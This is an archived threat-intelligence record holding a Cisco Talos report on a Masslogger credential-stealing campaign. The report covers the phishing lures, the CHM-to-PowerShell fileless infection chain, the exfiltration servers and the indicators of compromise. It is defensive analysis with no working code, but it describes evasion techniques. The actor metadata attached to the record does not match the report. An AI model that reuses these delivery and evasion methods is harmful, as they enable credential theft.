{ "id": "d6480334-a88a-4d1a-8c83-f1732519d061", "created_at": "2026-04-06T01:31:50.349167Z", "updated_at": "2026-04-10T13:12:27.508856Z", "deleted_at": null, "sha1_hash": "1caf3b4641cd170266316ed31e907de7ec4b6e7e", "title": "Masslogger campaigns exfiltrates user credentials", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2232838, "plain_text": "Masslogger campaigns exfiltrates user credentials\r\nBy Nick Biasini\r\nPublished: 2021-02-17 · Archived: 2026-04-06 00:44:42 UTC\r\nWednesday, February 17, 2021 08:00\r\nBy Vanja Svajcer.\r\nNews summary\r\nAs protection techniques develop, attackers are finding it harder to successfully attack their targets and\r\nmust find creative ways to succeed.\r\nCisco Talos recently discovered a campaign utilizing a variant of the Masslogger trojan designed to retrieve\r\nand exfiltrate user credentials from multiple sources such as Microsoft Outlook, Google Chrome and\r\ninstant messengers.\r\nApart from the initial email attachment, all the stages of the attacks are fileless and they only occur in\r\nvolatile memory.\r\nThese threats demonstrate several techniques of the MITRE ATT\u0026CK framework, most notably T1566 —\r\nPhishing, T1059.001 and T1059.007 — Command and Scripting Interpreters, T1140 —\r\nDeobfuscate/Decode Files or Information, T1497 — Virtualization/Sandbox Evasion, T1555.003 —\r\nCredentials from Web Browsers, T1115 — Clipboard Data, T1056.001 — Keylogging and T1048.003 —\r\nExfiltration Over Unencrypted/Obfuscated Non-C2 Protocol.\r\nAttackers are constantly reinventing ways to monetize their tools. Cisco Talos recently discovered an interesting\r\ncampaign affecting Windows systems and targeting users in Turkey, Latvia and Italy, although similar campaigns\r\nhttps://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html\r\nPage 1 of 17\n\nby the same actor have also been targeting users in Bulgaria, Lithuania, Hungary, Estonia, Romania and Spain in\r\nSeptember, October and November 2020.\r\nThe actor employs a multi-modular approach that starts with the initial phishing email and carries through to the\r\nfinal payload. The adversaries behind this campaign likely do this to evade detection. But it can also be a\r\nweakness, as there are plenty of opportunities for defenders to break the killchain.\r\nWhat's new?\r\nAlthough operations of the Masslogger trojan have been previously documented, we found the new campaign\r\nnotable for using the compiled HTML file format to start the infection chain. This file format is typically used for\r\nWindows Help files, but it can also contain active script components, in this case JavaScript, which launches the\r\nmalware's processes.\r\nHow did it work?\r\nThe infection starts with an email message containing a legitimate-looking subject line that seems to relate to a\r\nbusiness. The email contains a RAR attachment with a slightly unusual filename extension.\r\nThe usual filename extension for RAR files is .rar. However, RAR-compressed archives can also be split into\r\nmulti-volume archives. In this case, the filename creates files with the RAR extension named \"r00\" and onwards\r\nwith the .chm file extension. This naming scheme is used by the Masslogger campaign, presumably to bypass any\r\nprograms that would block the email attachment based on its file extension.\r\nCHM is a compiled HTML file that contains an embedded HTML file with JavaScript code to start the active\r\ninfection process. Every stage of the infection is obfuscated to avoid detection using simple signatures.\r\nThe second stage is a PowerShell script that eventually deobfuscates into a downloader and downloads and loads\r\nthe main PowerShell loader. The Masslogger loaders seem to be hosted on compromised legitimate hosts with a\r\nfilename containing one letter and one number concatenated with the filename extension .jpg. For example,\r\n\"D9.jpg\".\r\nThe main payload is a variant of the Masslogger trojan designed to retrieve and exfiltrate user credentials from a\r\nvariety of sources, targeting home and business users. Masslogger can be configured as a keylogger, but in this\r\ncase, the actor has disabled this functionality.\r\nSo what?\r\nWhile most of the public attention seems to be focused on ransomware attacks, big game hunting and APTs, it is\r\nimportant to keep in mind that crimeware actors are still active and can inflict significant damage to organizations\r\nby stealing users' credentials. The credentials themselves have value on the dark web and actors sell them for\r\nmoney or use them in other attacks.\r\nBased on the IOCs we retrieved, we have moderate confidence that this actor has previously used other payloads\r\nsuch as AgentTesla, Formbook and AsyncRAT in campaigns starting as early as April 2020.\r\nhttps://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html\r\nPage 2 of 17\n\nTechnical case overview\r\nIntroduction\r\nMasslogger is a spyware program written in .NET with a focus on stealing user credentials, mostly from the\r\nbrowsers but also from several popular messaging applications and email clients. It was released in April 2020 and\r\nsold on underground forums for a moderate price with a few licensing options.\r\nThe exfiltration of data takes place over one or more of these channels:\r\nFTP (plain text over default port 21), the configuration contains user credentials.\r\nHTTP — Using a PHP-based control panel.\r\nSMTP — The user has to specify email address, server and credentials to use it.\r\nWe won't dig deep into the functionality of the final Masslogger payload, as this was previously well-described by other researchers. Instead, we'll focus on the infection vector and the memory-only delivery\r\nchain before the final stage is loaded. In case of commodity spyware such as Masslogger, it is the infection\r\nchain and contextual information that distinguish the individual actors behind each campaign.\r\nThe infection chain we follow seems to focus on business users, with email being the infection vector. The email\r\ncontains a RAR attachment with a compiled HTML (.chm) attachment. The rest of the chain is split between\r\nJavaScript, PowerShell and .NET.\r\nEmail as an infection vector\r\nThe latest campaign began in mid-January. Based on the combination of discovered emails and file names, we\r\nbelieve it was targeting organizations in Turkey, Latvia and Italy. We have observed similar campaigns happening\r\nin several instances before, starting no later than September 2020. In previous campaigns, the actor was targeting\r\nusers in Bulgaria, Lithuania, Hungary, Estonia, Romania and Spain.\r\nhttps://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html\r\nPage 3 of 17\n\nEuropean countries targeted by the observed Masslogger campaigns from September 2020.\r\nThe email is written in the language of the targeted recipient's top-level domain. The first example is an email\r\ntargeted at users in Turkey with the subject \"Domestic customer inquiry\" and the body \"At the request of our\r\ncustomer, please send your attached best quotes.\"\r\nhttps://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html\r\nPage 4 of 17\n\nEmail campaign example targeting users in Turkey.\r\nSome earlier campaigns were purported to be a request to open and sign a memorandum of understanding. The\r\nactor attempted to make emails more credible by adding a link to the legitimate scanning application to the email\r\nfooter \"Shipped with Genius Scan for iOS.\"\r\nFor the campaigns in September, October and November, the adversaries sent emails containing a subject line that\r\ntranslates to \"MOU Information\" with the text \"Please return it signed and stamped. Best regards,\" in the body.\r\nhttps://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html\r\nPage 5 of 17\n\nAn example of an earlier email targeting users in Spain.\r\nAn example of an earlier email targeting users in Bulgaria.\r\nThe attachment file name for the latest campaign is chosen according to the email subject, with possible random\r\nstrings prepended, for example, \"70727_YK90054_Teknik_Cizimler.\" The attachment filename extension is\r\nchosen to bypass simple blockers that attempt to block RAR attachments using its default filename extension\r\n\".rar\". The actor changes the filename extension to RAR multi-volume filename extensions, starting from \".r00\".\r\nWinRAR and other RAR-capable unarchivers will still open the file without problems.\r\nThe attached RAR archive contains a single file with the \".chm\" filename extension. CHM stands for \"compiled\r\nHTML files,\" and it is one of the default formats for Windows Help files. Compiled HTML files can be easily\r\ncreated using the Windows HTML Help executable program hh.exe. The same program can be used with the\r\ncommand line option \"-decompile\" to extract the embedded and compressed HTML files.\r\nhttps://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html\r\nPage 6 of 17\n\nWhen the user opens the attachment with the default application, a simple HTML page is displayed, containing the\r\ntext \"Customer service, Please Wait…\"\r\nThe HTML page displayed when the .CHM attachment is opened.\r\nWhen the CHM file is decompiled and the HTML file extracted, it contains lightly obfuscated JavaScript code to\r\ncreate an HTML page. The HTML content is escaped and reversed, so it is easy to deobfuscate.\r\nhttps://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html\r\nPage 7 of 17\n\nObfuscated JavaScript code in the decompiled HTML file.\r\nThe HTML code contains an ActiveX object containing PowerShell code obfuscated in a similar way to strings in\r\nthe JavaScript code of the CHM file.\r\nHTML page with an ActiveX object embedded and PowerShell code.\r\nWhen deobfuscated, we can observe a PowerShell downloader stage, which simply connects to the download\r\nserver, usually a compromised legitimate host. The download server hosts the next stage of the infection.\r\nPowerShell downloader stage.\r\nhttps://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html\r\nPage 8 of 17\n\nThe URL to download the next stage ends in the path with the format [1Letter][1 to 2-digit number].jpg, for\r\nexample, hxxp://sinetcol[.]co/D7.jpg. This stage is encoded with a simple hexadecimal encoding scheme and is\r\nconverted to code by first splitting the downloaded content using the character \"^\" as the delimiter and then\r\nadding ASCII representation of each number to a string variable. Eventually, the string containing PowerShell\r\ncode is piped into the Invoke-Expression (IEX) cmdlet. This is the PowerShell loader.\r\nEncoded PowerShell loader\r\nThe PowerShell loader contains two encoded .NET assemblies. The first one is a DLL and the other an executable.\r\nLoader DLL and final Masslogger payload\r\nStart of the PowerShell loader.\r\nThe PowerShell loader first decodes the .NET DLL and then deobfuscates the string \"System.AppDomain\" to get\r\nthe reference to its method \"GetCurrentDomain.\" The loader then creates a byte array where it stores the\r\nMasslogger loader before it invokes the GetCurrentDomain function to get the context of execution and the\r\nprocess where the script is executing.\r\nThe acquired domain is then used to load the .NET DLL assembly into the powershell.exe process space with the\r\nassembly name \"Waves.dll.\" Waves employs a Costura loader, an open-source reflective assembly loader\r\nalternative to ILMerge and is obfuscated with DotNetGuard obfuscator, all to make analysis and detection more\r\ndifficult.\r\nOnce the DLL is loaded as a .NET assembly, the PowerShell loader calls the method tasked with creating a\r\nmsbuild.exe process, injecting the final payload into its process space and launching it.\r\nhttps://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html\r\nPage 9 of 17\n\nAfter decoding, the DLL loader assembly is created and loaded.\r\nThe Masslogger payload is stored in memory as a buffer compressed with gzip. The buffer is decompressed by the\r\nDLL loader. The internal assembly name of the payload is \"service-med-star.gr\", which is a concatenation of the\r\nusername and the server used for FTP credentials exfiltration.\r\nMasslogger is a credential stealer and keylogger with the ability to exfiltrate data through SMTP, FTP or HTTP\r\nprotocols. For the first two, no additional server-side components are required, while the exfiltration over HTTP is\r\ndone through the Masslogger control panel web application.\r\nThis version of Masslogger contains the functionality to target and retrieve credentials from the following\r\napplications:\r\nPidgin messenger client\r\nFileZilla FTP client\r\nDiscord\r\nNordVPN\r\nOutlook\r\nFoxMail\r\nThunderbird\r\nFireFox\r\nQQ Browser\r\nChromium based browsers (Chrome, Chromium, Edge, Opera, Brave)\r\nThe configuration for a payload is stored as an encrypted array of strings within the payload itself. Although the\r\nconfiguration is encrypted and the payload obfuscated with an unknown obfuscator it is still possible to find code\r\nused to decrypt the configuration as previously documented by Mario Henkel.\r\nThe configuration is decrypted using the standard .NET framework functionality. This allows us to place a\r\nbreakpoint to the beginning of the method System.Security.Cryptography.AesCryptoServiceProvider and step\r\nback to the configuration decryption function within the payload body and trace the value returned to the caller\r\nafter each configuration string is decrypted.\r\nhttps://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html\r\nPage 10 of 17\n\nBreakpoints placed to decrypt the payload configuration.\r\nThe decrypted configuration is parsed by Masslogger to configure the trojan to target a specific set of applications\r\nand exhibit functionality. In our case, the Masslogger version we are dealing with is 3.0.7563.31381 and the\r\nexfiltration is conducted over FTP, with med-star.gr as the FTP exfiltration server.\r\nAlthough the payload is configured to use FTP, the actor has installed a version of Masslogger control panel on\r\nthe same server with the URL hxxps://www[.]med-star[.]gr/panel/?/login.\r\nMasslogger control panel login screen.\r\nhttps://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html\r\nPage 11 of 17\n\nDecrypted Masslogger configuration strings.\r\nOnce the credentials from targeted applications are retrieved, they are uploaded to the exfiltration server with a\r\nfilename containing the username, two-letter country ID, unique machine ID and the timestamp for when the file\r\nwas created.\r\nUploaded credential files begin with the information about the user and the infected system, configuration options\r\nand processes running, followed by the retrieved credentials delimited by lines containing targeted application\r\nnames.\r\nhttps://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html\r\nPage 12 of 17\n\nThe beginning of an uploaded exfiltrated credentials file.\r\nConclusion\r\nThis recently discovered Masslogger campaign — which we attribute to an actor launching similar credential-stealing campaigns — back to at least September 2020. There is moderate confidence the author has previously\r\nused AgentTesla with similar goals in April 2020. The campaigns are targeted to several European countries,\r\nshifting its focus monthly. In our research, we detected email messages targeting Turkey, Latvia, Lithuania,\r\nBulgaria, Hungary, Estonia, Romania, Italy and Spain, as well as messages written in English.\r\nhttps://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html\r\nPage 13 of 17\n\nMasslogger campaign modules.\r\nThe observed campaign is almost entirely executed and present only in memory, which emphasizes the importance\r\nof conducting regular and background memory scans. The only component present on disk is the attachment and\r\nthe compiled HTML help file.\r\nUsers are advised to configure their systems for logging PowerShell events such as module loading and executed\r\nscript blocks as they will show executed code in its deobfuscated format. Talos will continue to track similar\r\ncampaigns to make sure adequate protection is included in Cisco Secure products.\r\nCoverage  \r\nWays our customers can detect and block this threat are listed below.\r\nhttps://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html\r\nPage 14 of 17\n\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these\r\nthreat actors. Exploit Prevention present within AMP is designed to protect customers from unknown attacks such\r\nas this automatically.\r\nCisco Cloud Web Security (CWS) orWeb Security Appliance (WSA) web scanning prevents access to malicious\r\nwebsites and detects malware used in these attacks.\r\nEmail Security can block malicious emails sent by threat actors as part of their campaign.\r\nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention\r\nSystem (NGIPS),Cisco ISR andMeraki MX can detect malicious activity associated with this threat.\r\nAMP Threat Grid helps identify malicious binaries and builds protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs,\r\nwhether users are on or off the corporate network.\r\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase onSnort.org.\r\nOSQuery\r\nCisco AMP users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected\r\nwith this specific threat. For specific OSqueries on this threat, click here https://github.com/Cisco-Talos/osquery_queries/blob/master/win_forensics/potential_compiled_HTML_abuse.yaml\r\nhttps://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html\r\nPage 15 of 17\n\nIOCs\r\nURLs\r\nhxxp://sinetcol[.]co/A7.jpg - January\r\nhxxp://sinetcol[.]co/D7.jpg - January\r\nhxxp://becasmedikal[.]com.tr/A5.jpg - January\r\nhxxp://risu[.]fi/D9.jpg - November\r\nhxxp://topometria[.]com.cy/A12.jpg - September\r\nhxxp://bouinteriorismo[.]com/R9.jpg - November\r\nhxxp://optovision[.]gr/4B.jpg - October\r\nhxxp://hotelaretes[.]gr/V8.jpg - October\r\nhxxp://jetfleet24[.]com/T5.jpg - October\r\nhxxps://www.med-star[.]gr/panel/?/login - C2 panel\r\nfxp://med-star[.]gr - exfiltration FTP\r\nEmail messages\r\n54ca02b013e898be2606f964bc0946430a276de9ef478596a1d33cb6f806db8c\r\n516d45fcbdbdc4526bdd0f6979fe3ad929b82e1fd31247c7891528703ac16131\r\n1c0a17a11a4b64dbe6082be807309a3c447b4861ea56155c1bfcf4d072746d38\r\n7c92e1befd1cc5fa4a253716ac8441f6e29a351b7e449d3b8ef171cb6181db8e\r\n83c64bf1c919c5e6ce25633d0eff2b7cda5b93a210b60372d984f862933e0b4e\r\ne2c3ad4bedf9e6d1122d418e97dfb743b1559a5af99befabed5bb7c6164028a8\r\n8129a86056aa28f2af87110bb25732b14b77f18a7c820d9bcf1adcd2c7d97a7a\r\nInitial scripts\r\n742b9912f329c05296e2f837555dceea0ae3e06e80aa178a9127692d25e21479 - September 2020, Windows batch\r\nfile\r\n04910322c2e91d58e9ed3c5bcc3a18be1ba1b5582153184d1f5da3d9c42bac15 - January 2021, CHM file\r\naac62b80b790d96882b4b747a8ed592f45b39ceadd9864948bb391f3f41d7f9f - January 2021, CHM file\r\nf946e1c690fc2125af4ad7d3d1b93c6af218a82d55a11a5a6ee5a9b04a763e7f - January 2021, CHM file\r\n9cd7622ade7408c03e0c966738f51f74f884fbafdf3fe97edf4be374a7fb1d77 - November 2020, CHM file\r\n5415bcc4bffa5191a1fac3ce3b11c46335d19f053f5d9d51a10f4ed77393ed82 - October 2020, CHM file\r\nDownloaded obfuscated PowerShell loaders\r\n0eef444f062ea06340ca7ef300cb39c44a6cdf7ead2732bb885d79f098991cb8\r\ndf929834de2b10efaa8b2cb67c71ae98508cfb79f22213ee24aedc38a962ccb5\r\nDLL loaders\r\nhttps://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html\r\nPage 16 of 17\n\n49fc4103d8747de341b9d3cd08f05c83f2e6943215df6939d02c7c3099345343\r\n39dbe72ea847012243e4642d766fd4cf6fe138302cbfba67c65088b2cdefc1f4\r\na16fa0a14f0d20b66af550e3cdb0b60f8ffb965415404df6cc8164e62dfbe124\r\nda256158ac0d7dc031b2541f9b7486d9822a402b6e9c5176c2ec2ed717592fbf\r\nMasslogger payload\r\n2487b12f52b803f5d38b3bb9388b039bf4f58c4b5d192d50da5fa047e9db828b\r\nSource: https://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html\r\nhttps://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html\r\nPage 17 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html" ], "report_names": [ "masslogger-cred-exfil.html" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775439110, "ts_updated_at": 1775826747, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/1caf3b4641cd170266316ed31e907de7ec4b6e7e.pdf", "text": "https://archive.orkl.eu/1caf3b4641cd170266316ed31e907de7ec4b6e7e.txt", "img": "https://archive.orkl.eu/1caf3b4641cd170266316ed31e907de7ec4b6e7e.jpg" } }